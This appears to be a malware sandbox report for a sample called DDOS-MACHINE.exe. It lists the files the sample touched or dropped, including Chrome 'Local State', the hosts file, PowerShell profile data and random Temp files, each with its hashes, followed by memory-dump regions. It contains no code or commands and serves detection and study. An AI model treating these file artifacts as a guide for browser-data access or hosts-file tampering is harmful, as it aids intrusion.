be4fc6679d059dec81c40b7a4e702e9b

SHA1
8f3e5a5a1124ce8e51ce6d6aa76fb82a92f8ed52

SHA256
d02e88b1d1a7c88c320bed2ea7c254b548de063df559bf48d759970938e5129f

SHA512
8e5deb8212717dddd89688295308545965ceb638c1a045f7923b758965f2232e65f39b34a8e6090ea48076f3e0306ca30bc8b33e2ab7ff13b45a0a78aeab8104

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
f84da2b9297a9936b314948df1e44891

SHA1
6808d08670607350ae9cbb24f02fb25e6d316b24

SHA256
6524833e75bf188f56bbea29a8fd76336d531f2740371d5b3c7f2c16d8b88580

SHA512
742311e56bc6fa832cf5ade1a179b291b3e01c33383f7ff5b7c929a643d246a478474ba9410c7fafae432e5ae26b03327adc35b4e06c400865fb6767efb8b010

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
228KB

MD5
503fe1e7870c0043f051f4df1ffc7218

SHA1
fed9e5e4fa82b5e32e8191e1eaf0b78e1438f8e1

SHA256
1f543e5f4a16534d4134c4b070064aeddffd2e713cd2c26c225b2bc562694c3c

SHA512
348b9783662a1e0bd53b19ee9855011ca2fca0a713d0ffefd1ffb9446a838504b31a5d1c2637af93a6ff61cd542e9567a55a7e24af0d010aac83234db64dc81b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
228KB

MD5
e00b53fb003da82b5092cede21759bee

SHA1
6e194e86b6883ce7e4582a100cdfe4225dafc253

SHA256
5785687717f62ef0f02d424df9cd7735a4b198e5e5f78e66c76cd97d073ff8b1

SHA512
82686f943aa0348da64bbbc8607c4173dd7fe9f8d98cf27d00b4697dc326dad393ced5b4f57f17f5aeb6fdbed15ab510da0dc96a1e27f11b0188e6f25535e3e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DDOS-MACHINE.exe.log

Filesize
1KB

MD5
5f36c205799cb2f8966c7d5130cea05c

SHA1
614993e3437ff9363c3eb698d7dba379a453dd6e

SHA256
8eaaf40fe7570c8fa593702f38fee2f54538ba6a77d7c54005e8d1f150f5180c

SHA512
7053cac09d2e71675771bae4ac25f1a47f96be662f6bb2aab24668ed4c1809fb1261b2d6465202c09bd0310bf875361a815db6dda6006dcfbbb5fb3c50c5927b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
fa21dd50b4e64421076f843031c8ccf7

SHA1
2c56e94f130c0d8d77116e939ffee4e37cf982bd

SHA256
e4f21aca1e12aafa8de7af24b79a75526e902c7d4b3fea5bdb6e723976997be3

SHA512
b8de2bfeb7af06c587dd1f424d410cf83471f31a55a3ea4c4481ce07ffd9bf66ddc1f7775ecd6ac65ac33baaec90ba5a208a9aefc84f31125a50dfb919982687

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cd5b2555a0e703bc746e242654a09c2f

SHA1
4021bfba22c0fce16709bfa6140d11272b7bd8b4

SHA256
73679042b477828c6c8400590ca1434f5f6b7379aede1442f80bb9ede3bc7811

SHA512
404a94bbc1cbcf98dba90160ab65a8acc5a1660d801bf7425ab1fe641599bda1b6494d4d6b65c6584e4ca6c1dea4b1acfde88e4a6d216194dca3b6ae6ca605f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
63e54ca6551a4a091cca75d55e9122b2

SHA1
7afd34b6d2008fec2a36d984d535aea7406a66ce

SHA256
e263f5f17c235debb019644319a773d5feabd2f80fdb3d7783762ba572fe875b

SHA512
22e332795de470945a1864cfe32e90cd993554cf139467610abdb20b1608c2a7e0177f001b2b6f0032daa780980207943b6e1e4f0960e0576a1aea76fd1dd13e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
36bb833bcefdd2f80a289fc681c87627

SHA1
4204fa10680f0a9c2699a9eb52709db1cd68e0b7

SHA256
52be5401760e6cc30c6018d277e7ce91aa262b3888297f76e95a20fdda8e2ae6

SHA512
233fbb528d3b7196fb967fff74e66dd589b6a302e97774a24fbeb971996aa6c1b17f24f19380873c976978552e245b3dd065cdb9d4133ce554c507d92f8778e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6bddc96a32b9ed8fc70b141ccf4a39b2

SHA1
0f33c0699da40a5eadcec646791cf21cdb0dd7c6

SHA256
cb3853abe77eb0da8a1caccb49e97a573b6f35570722eb759116a645d724c132

SHA512
e41f1597b4129b759e4199db195df1c24e47cc47dc9850fab2d48e44bc3d37dc3658fbfbb62332a0b93c552587d7fab09de1634f605faa2209b8470c2a6eaca6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ac871344dc49ae49f13f0f88acb4868

SHA1
5a073862375c7e79255bb0eab32c635b57a77f98

SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60a84ea8f3888e51bb0fe4856926a639

SHA1
43848b5a831f8fe7623694b36b17554b83770269

SHA256
5d219511d1091f4dc52ef6664815bcacf013c76b695bf2195aa439a6cc431504

SHA512
f6381deedc9612c96914173d948bd601192256c1b65a6b6be3c6664de84df64fb8740fa0205846e0380305bf5442e52991d134ff94b8edc899775befcc4a86ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
ccf1b703c8f1f34a2faf84a676e0ef0c

SHA1
46dc045aa7dcf8938c0352d4125e796d38c4b7a3

SHA256
789e5eaacf5284c772fd75aab4c445eadff4816410167eea41a185ffe35b36fa

SHA512
c53f8516e7e65f86a0cba52ba2a7aa5c9e0bee4285b6cae525a0c1202d04f779a20225a6b8f8e674daf1ab9b4b225b3ebb7cda7588b3ab062761b136eb86b24a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
7ac560af386b635541815194e95d9f2b

SHA1
586036ead11f18906d0845350641965beebf3d9f

SHA256
382230d8cdd6d7a20d0d609ea4341abd2481cb7bfc27df3e18937e19aa5f381c

SHA512
637388ee50a08f561055485236881924115f8b30fa74e68709f6adeb1531222fd4a57b2f2331691e3f9302789a85f9f9d385e07529cf1407eedd706b972ec243

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
441a842138038e6385e430a90d7ea608

SHA1
7b3712d2cdd37e10ee9b3994131ee5175e920f01

SHA256
47592f3324179912d3bdba336b9e75568c2c5f1a9fb37c1ba9f0db9df822164c

SHA512
9dbddc3216f2a132ae3961b3aeac2c5b8828dcc9292f6c5bf1171c47453aa8687f92658818d771413492c0ea565e9ede17b9c03e427af9dc2ac21a78369a6666

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4970ff126f5f8e180b63e925cfe9516a

SHA1
585fa865999fc4b2ba1ab0043f1e2d24f5812470

SHA256
68a0fa3544e7345df77f2a3bf4f17e9a960438420556137b759ac4a75ba2f1ba

SHA512
e41d92e5fc5ac401199f7d1f4fdcfaca47bef8287c1a9a8683ef2fe79e6755fe2de3f3426f8901246ba18a0bbab63f2e53b61c01f7c07fe1d2bf8468c27ebfda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
babd11cb4279de8935b65512aad56972

SHA1
41b7c2f116f5553da4850fe214a9560cec5ff3b8

SHA256
3bfb86256144d7ebfbd51db403d5f545c4609ffc22e6424cdcfb4f55827976d1

SHA512
b9db01ebf61c94d54220547ab9ac24e5f63e99c1ce50f35959f97b5be49f6aee0dbe28157142dd41456af345805097afd275aab9bd419a4559a8ee887a56de6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57083a8e45ebe4fd84c7c0f137ec3e21

SHA1
857b5ea57f7bcf03cadee122106c6e58792a9b84

SHA256
f20102c4dc409cad3cdaf7a330c3a18a730a9d7d902b9fbee2a84186cba93d40

SHA512
4bbc21c07c05ee1f783242f0fb59324d5ff9ae18bdf892f02980d582fed83380888eeba58e1a6a321507cfd5d4fe82a328a0d3482b29633be4e3ebbeac636f87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
10254f48b63b60ae6245903153592e48

SHA1
2c300d1c60c50e8896705022bc402c423681f40a

SHA256
b3778ffb5260878714023fd1abc70c4e850b5397c2b32a3975b1ff28bfd96c69

SHA512
6a7e7844c47a07bc8fd0b59267f0d1bac460f672ada93131edd65ca2eb33159de9f6291a1acde745f32991b364e9ceac697f2dfcf1a2696b51a9120dd7af77d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
4acd59a3c57725ef965d4de405c8f943

SHA1
d7d2216b679c4b401484d2e5138523a9e15f4b6c

SHA256
37212a6be07d56dd091dd2cffeb043bdb427785105a15de5f1a8e5ba35bfc6a0

SHA512
6fb13555b517e4ec3ea96cb15e370cd32126c7f6c79bd73f0ee369f82f84f9b2718696eb0045af34b4e5719592a48aa411023ab1cd07b649f81818f31476de82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
87ebe221d639e66210ef10c93e5f83c3

SHA1
483a666b82f7b59e2d569f6f331fa3989fe0f526

SHA256
9a41c90023823aa68dc48f5d8592910dc2ad1116bf54870a0832aba787990380

SHA512
2a1e22894388a79526f39db4fa7c65db92626719337f865eaac39d0bb28dc95726fba62c1f0d659864843a2804bd803fe3dfbc0840421c80ff735192928efcce

Download Submit
C:\Users\Admin\AppData\Local\Temp\4QUQByLOD2pNUUh

Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

Download Submit
C:\Users\Admin\AppData\Local\Temp\GWA3B3Ew3TfancO

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\Pps3uUKOUR1HpOx\Display\Display.png

Filesize
86KB

MD5
0e11ede9a3eb0fe0b593232d8de92596

SHA1
537289386b0c99f5209169b49ac45802990af9a8

SHA256
f303b69c646e50f12b635d2af06e7f90dc5b979a6378bc3b8d076fe6820fed60

SHA512
3c0033be1616f2dc2ca478604020cd3639ec626ae3d01de6ae1c3785fea69f6a27c6ef7806ad0c49dc52fe11a5bfc51557e796be82ee7a0271f0603a57d8b040

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n1pf2hxf.iuc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\zuXsc1Zz1HEZnGn

Filesize
20KB

MD5
22be08f683bcc01d7a9799bbd2c10041

SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de

SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

Download Submit
C:\Users\Admin\Downloads\DDOS-MACHINE.exe

Filesize
229KB

MD5
f35e43ef3dda4b4db8692d66a2a6118c

SHA1
2d815b29521a43aff75e11728fa7b0f154bd5db3

SHA256
21e865574fa75760c19d3677b1506e6530166783d8e7d0260ddd6e32f034ca2b

SHA512
314621bf6ab9e6d558c50c5975aa26e4f7fe14a5934756424306bd3008f1c153f4c03e662a6830998394bf1f1d695e579cf1718987785452105e27ceb94522fe

Download Submit
C:\Users\Admin\Downloads\DDOS-MACHINE.exe:Zone.Identifier

Filesize
52B

MD5
dfcb8dc1e74a5f6f8845bcdf1e3dee6c

SHA1
ba515dc430c8634db4900a72e99d76135145d154

SHA256
161510bd3ea26ff17303de536054637ef1de87a9bd6966134e85d47fc4448b67

SHA512
c0eff5861c2df0828f1c1526536ec6a5a2e625a60ab75e7051a54e6575460c3af93d1452e75ca9a2110f38a84696c7e0e1e44fb13daa630ffcdda83db08ff78d

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/680-205-0x000001DAE8F30000-0x000001DAE8F52000-memory.dmp

Filesize
136KB

Download
memory/2068-204-0x00007FFCFC280000-0x00007FFCFCD42000-memory.dmp

Filesize
10.8MB

Download
memory/2068-202-0x00007FFCFC283000-0x00007FFCFC285000-memory.dmp

Filesize
8KB

Download
memory/2068-284-0x00007FFCFC280000-0x00007FFCFCD42000-memory.dmp

Filesize
10.8MB

Download
memory/2068-232-0x00000156E2B80000-0x00000156E2BD0000-memory.dmp

Filesize
320KB

Download
memory/2068-203-0x00000156C8330000-0x00000156C8370000-memory.dmp

Filesize
256KB

Download
memory/2068-235-0x00000156E2BD0000-0x00000156E2BEE000-memory.dmp

Filesize
120KB

Download
memory/2068-266-0x00000156E2A90000-0x00000156E2A9A000-memory.dmp

Filesize
40KB

Download
memory/2068-267-0x00000156E2AC0000-0x00000156E2AD2000-memory.dmp

Filesize
72KB

Download
memory/2068-231-0x00000156E2B00000-0x00000156E2B76000-memory.dmp

Filesize
472KB

Download